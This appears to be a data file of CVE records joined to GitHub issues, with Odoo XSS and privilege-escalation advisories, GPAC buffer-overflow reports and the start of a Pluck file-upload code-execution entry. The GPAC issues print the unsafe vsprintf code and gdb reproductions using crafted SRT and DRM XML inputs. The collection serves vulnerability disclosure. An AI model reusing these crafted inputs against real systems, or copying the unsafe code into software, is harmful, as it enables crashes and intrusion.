"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "A958BCBB-C656-44A5-A9A9-66A66AEA67A0",
"versionEndExcluding": null,
"versionEndIncluding": "12.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "059733D6-977F-4731-BA24-36F6F50F76AB",
"versionEndExcluding": null,
"versionEndIncluding": "12.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32515 | [
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-11-28-2
Cross-site scripting vulnerability in the Discuss App of Odoo Community 12.0 and earlier, and Odoo Enterprise 12.0 and earlier allows remote attackers to inject arbitrary web script in the browser of an internal user of the system by tricking them into inviting a follower on a document with a crafted name.
**Affects**: Odoo Community 12.0 and earlier and Odoo Enterprise 12.0 and earlier
**Component**: Discuss
**Credits**: Juba Baghdad, Adan Álvarez (A2secure), Bharath Kumar (Appsecco)
and Subash SN (Appsecco)
**CVE ID**: [CVE-2018-15635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15635)
## I. Background
The Discuss App provides generic productivity components to other Odoo Apps,
including a "follower" system allowing users to subscribe to status updates and
other discussions related to a given document.
## II. Problem Description
The Discuss component for inviting a follower on a document did not properly
sanitize the document information when generating the invitation text.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: No privileged account necessary
**CVSS3 Score**: Medium :: 5.9
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N)
A remote attacker could employ various techniques to inject a document with
a malicious name into a vulnerable Odoo deployment, via contact forms, job
forms, email routes (aliases), etc.
The attacker could then use social engineering techniques to trick an internal
user of the system into inviting them on the document with a crafted name, which
could trigger the execution of arbitrary web script in the victim's browser.
This could lead to the leak of sensitive data, or even complete session takeover.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
No workaround is available, but the issue is mitigated by the fact that the
attacker will have to create a document with a suspicious name containing
scripting code, so the victim is likely to notice it before inviting them.
Applying the patch is strongly recommended.
Odoo Online servers have been patched as soon as the correction was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation.
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/12.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to the latest source
code layout of the Odoo project on GitHub. If your installation differs, please
extract the various patch hunks from the files and apply them in the appropriate
locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 10.0: 5472bbded51056a2322a24304db62e1d65dca464
- 11.0: 4d89b5e70b9718890453e0cde8fc2c7c9b5696e0
- 12.0: cb097e05ea7aa6e0931581fae395541160688f12
- 12.0-ent, 11.0-ent and 10.0-ent (Enterprise): see 12.0, 11.0 and 10.0.
| [SEC] ODOO-SA-2018-11-28-2 (CVE-2018-15635) - Cross-site scripting vulnerabil... | https://api.github.com/repos/odoo/odoo/issues/32515/comments | 0 | 2019-04-08T13:40:52Z | 2019-04-08T13:40:54Z | https://github.com/odoo/odoo/issues/32515 | 430,458,345 | 32,515 |
CVE-2018-15640 | 2019-04-09T16:29:01.193 | Improper access control in the Helpdesk App of Odoo Enterprise 10.0 through 12.0 allows remote authenticated attackers to obtain elevated privileges via a crafted request. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32514"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "A4C406AC-8BCE-431E-9E09-7A793E3C750F",
"versionEndExcluding": null,
"versionEndIncluding": "12.0",
"versionStartExcluding": null,
"versionStartIncluding": "10.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32514 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-11-28-1
Improper access control in the Helpdesk App of Odoo Enterprise 10.0 through 12.0 allows remote authenticated attackers to obtain elevated privileges via a crafted request.
**Affects**: Odoo 10.0 Enterprise through 12.0 (Enterprise Editions only)
**Component**: Helpdesk
**Credits**: Martin Trigaux and Jérôme Maes
**CVE ID**: [CVE-2018-15640](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15640)
## I. Background
Odoo's Helpdesk App provides multi-channel customer service, with tools
for managing SLA rules, automated actions and team productivity objectives.
## II. Problem Description
The web route used to allow helpdesk agents to change their own productivity
targets did not properly control access, and could allow any user to modify
arbitrary attributes of their own user profile.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: User account required
**CVSS3 Score**: High :: 8.1
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
A malicious user (including external portal users) could craft a request
to alter arbitrary attributes of their own user profile, including sensitive
attributes like the user group they belong to.
This would allow them to gain elevated privileges on the system.
This vulnerability only affects Odoo Enterprise deployments where the Helpdesk
application is installed.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
Uninstalling the Helpdesk App is the only known workaround to prevent
exploiting this vulnerability, at the expense of losing all the features of that
App, and causing other parts of the Odoo deployment to stop working (depending
on the version and other installed Apps).
Applying the patch is strongly recommended.
Odoo Online servers have been patched as soon as the correction was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation.
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/12.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to the latest source
code layout of the Odoo project on GitHub. If your installation differs, please
extract the various patch hunks from the files and apply them in the appropriate
locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 10.0-ent: odoo/enterprise@410e038dd4e561143d741862203e7f3ed69f326a
- 11.0-ent: odoo/enterprise@f4598e62c342f4a80eba3fc9e04136af8e2ceeea
- 12.0-ent: odoo/enterprise@677d637ae7ff15a8be19063a049ca22f19851857
- Community Editions of Odoo are not impacted by this vulnerability.
| [SEC] ODOO-SA-2018-11-28-1 (CVE-2018-15640) - Improper access control in the... | https://api.github.com/repos/odoo/odoo/issues/32514/comments | 0 | 2019-04-08T13:40:48Z | 2019-04-08T13:40:50Z | https://github.com/odoo/odoo/issues/32514 | 430,458,311 | 32,514 |
CVE-2019-11221 | 2019-04-15T12:31:36.477 | GPAC 0.7.1 has a buffer overflow issue in gf_import_message() in media_import.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1203"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/04/msg00025.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/1203 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | There is a buffer overflow issue in gf_import_message () function, media_import.c
szMsg overflow when srt file contains more than one txt line and the line is long enough.
GF_Err gf_import_message(GF_MediaImporter *import, GF_Err e, char *format, ...)
{
if (gf_log_tool_level_on(GF_LOG_AUTHOR, e ? GF_LOG_WARNING : GF_LOG_INFO)) {
va_list args;
char szMsg[1024];
va_start(args, format);
vsprintf(szMsg, format, args);
va_end(args);
GF_LOG((u32) (e ? GF_LOG_WARNING : GF_LOG_INFO), GF_LOG_AUTHOR, ("%s\n", szMsg) );
}
return e;
}
//////////////////////debug/////////////////////
(gdb) set args -srt 0 crafted_text.srt
(gdb) r
Starting program: /opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box -srt 0 crafted_text.srt
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Timed Text (SRT) import - text track 400 x 60, font Serif (size 18)
Bad SRT formatting - expecting number got "hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hel"
*** stack smashing detected ***: /opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box terminated
Program received signal SIGABRT, Aborted.
0x00007ffff725bc37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 0x00007ffff725bc37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007ffff725f028 in __GI_abort () at abort.c:89
#2 0x00007ffff72982a4 in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff73a4113 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff732fbbc in __GI___fortify_fail (msg=<optimized out>, msg@entry=0x7ffff73a40fb "stack smashing detected") at fortify_fail.c:38
#4 0x00007ffff732fb60 in __stack_chk_fail () at stack_chk_fail.c:28
#5 0x00007ffff78b28eb in gf_import_message (import=0x7fffffff9b60, e=GF_CORRUPTED_DATA, format=0x7ffff7b3d7f0 "Bad SRT formatting - expecting number got \"%s\"") at media_tools/media_import.c:59
#6 0x00007ffff795db01 in gf_text_import_srt (import=0x7fffffff9b60) at media_tools/text_import.c:505
#7 0x00007ffff7966e38 in gf_import_timed_text (import=0x7fffffff9b60) at media_tools/text_import.c:2673
#8 0x00007ffff78ded42 in gf_media_import (importer=0x7fffffff9b60) at media_tools/media_import.c:10663
#9 0x000000000041c71c in mp4boxMain (argc=4, argv=0x7fffffffe548) at main.c:4129
#10 0x0000000000423d05 in main (argc=4, argv=0x7fffffffe548) at main.c:5712
(gdb)
Guoxiang Niu, EaglEye Team
| buffer overflow issue 6# | https://api.github.com/repos/gpac/gpac/issues/1203/comments | 6 | 2019-02-12T03:44:32Z | 2019-04-19T09:00:55Z | https://github.com/gpac/gpac/issues/1203 | 409,106,668 | 1,203 |
CVE-2019-11222 | 2019-04-15T12:31:36.507 | gf_bin128_parse in utils/os_divers.c in GPAC 0.7.1 has a buffer overflow issue for the crypt feature when encountering a crafted_drm_file.xml file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/gpac/gpac/commit/f3698bb1bce62402805c3fda96551a23101a32f9"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1204"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1205"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/04/msg00025.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/1204 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | there is a buffer overflow issue for crypt feature when use a crafted_drm_file.xml file.
overflow occur when use a crafted key value.
root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# gdb ./MP4Box
(gdb) set args -crypt crafted_drm_file.xml overview.mp4 -out overview_encrypted.mp4
(gdb) r
Starting program: /opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box -crypt crafted_drm_file.xml overview.mp4 -out overview_encrypted.mp4
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[CORE] 128bit blob is not 16-bytes long: 5544694d47473326622665665a396b3611111111111111111111111111111111111111111111111111111111111111111111111111111111
[CENC] Cannnot parse key value
*** Error in `/opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box': free(): corrupted unsorted chunks: 0x0000000000692030 ***
Program received signal SIGABRT, Aborted.
0x00007ffff725bc37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 0x00007ffff725bc37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007ffff725f028 in __GI_abort () at abort.c:89
#2 0x00007ffff72982a4 in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff73a66b0 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff72a455e in malloc_printerr (ptr=<optimized out>, str=0x7ffff73a6800 "free(): corrupted unsorted chunks", action=1) at malloc.c:4996
#4 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0) at malloc.c:3840
#5 0x00007ffff6812e1b in inflateEnd () from /lib/x86_64-linux-gnu/libz.so.1
#6 0x00007ffff68183d9 in gzclose_r () from /lib/x86_64-linux-gnu/libz.so.1
#7 0x00007ffff76609fd in xml_sax_read_file (parser=0x68ba30) at utils/xml_parser.c:1177
#8 0x00007ffff7660db2 in gf_xml_sax_parse_file (parser=0x68ba30, fileName=0x7fffffffe7d3 "crafted_drm_file.xml", OnProgress=0x0) at utils/xml_parser.c:1269
#9 0x00007ffff794c69a in load_crypt_file (file=0x7fffffffe7d3 "crafted_drm_file.xml") at media_tools/ismacryp.c:388
#10 0x00007ffff79552ad in gf_crypt_file (mp4=0x670c20, drm_file=0x7fffffffe7d3 "crafted_drm_file.xml") at media_tools/ismacryp.c:2882
#11 0x000000000042188c in mp4boxMain (argc=6, argv=0x7fffffffe548) at main.c:5202
#12 0x0000000000423d05 in main (argc=6, argv=0x7fffffffe548) at main.c:5712
(gdb)
Guoxiang Niu, EaglEye Team
| buffer overflow issue 7# | https://api.github.com/repos/gpac/gpac/issues/1204/comments | 1 | 2019-02-13T07:12:39Z | 2019-04-19T08:50:59Z | https://github.com/gpac/gpac/issues/1204 | 409,659,238 | 1,204 |
CVE-2019-11222 | 2019-04-15T12:31:36.507 | gf_bin128_parse in utils/os_divers.c in GPAC 0.7.1 has a buffer overflow issue for the crypt feature when encountering a crafted_drm_file.xml file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/gpac/gpac/commit/f3698bb1bce62402805c3fda96551a23101a32f9"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1204"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1205"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/04/msg00025.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/1205 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | there is a buffer overflow issue for crypt feature when use a crafted_drm_file.xml file.
overflow occur when use a crafted ID128 value.
root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# gdb ./MP4Box
(gdb) set args -crypt drm_file.xml overview.mp4 -out overview_encrypted.mp4
(gdb) r
Starting program: /opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box -crypt drm_file.xml overview.mp4 -out overview_encrypted.mp4
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[CORE] 128bit blob is not 16-bytes long: 6770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C31
[XML/NHML] Cannot parse ID128
*** stack smashing detected ***: /opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box terminated
Program received signal SIGABRT, Aborted.
0x00007ffff725bc37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 0x00007ffff725bc37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007ffff725f028 in __GI_abort () at abort.c:89
#2 0x00007ffff72982a4 in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff73a4113 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff732fbbc in __GI___fortify_fail (msg=<optimized out>, msg@entry=0x7ffff73a40fb "stack smashing detected") at fortify_fail.c:38
#4 0x00007ffff732fb60 in __stack_chk_fail () at stack_chk_fail.c:28
#5 0x00007ffff7664910 in gf_xml_parse_bit_sequence_bs (bsroot=0x6950d0, bs=0x695200) at utils/xml_parser.c:2173
#6 0x00007ffff766495f in gf_xml_parse_bit_sequence (bsroot=0x6950d0, data=0x7ffffffbdcb8, data_size=0x7ffffffbdc84) at utils/xml_parser.c:2181
#7 0x00007ffff7954e85 in gf_cenc_parse_drm_system_info (mp4=0x670c20, drm_file=0x7fffffffe7db "drm_file.xml") at media_tools/ismacryp.c:2817
#8 0x00007ffff79553ec in gf_crypt_file (mp4=0x670c20, drm_file=0x7fffffffe7db "drm_file.xml") at media_tools/ismacryp.c:2898
#9 0x000000000042188c in mp4boxMain (argc=6, argv=0x7fffffffe548) at main.c:5202
#10 0x0000000000423d05 in main (argc=6, argv=0x7fffffffe548) at main.c:5712
Guoxiang Niu, EaglEye Team
| buffer overflow issue 8# | https://api.github.com/repos/gpac/gpac/issues/1205/comments | 1 | 2019-02-13T09:49:56Z | 2019-04-19T08:50:26Z | https://github.com/gpac/gpac/issues/1205 | 409,715,577 | 1,205 |
CVE-2019-11344 | 2019-04-19T19:29:00.233 | data/inc/files.php in Pluck 4.7.8 allows remote attackers to execute arbitrary code by uploading a .htaccess file that specifies SetHandler x-httpd-php for a .txt file, because only certain PHP-related filename extensions are blocked. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
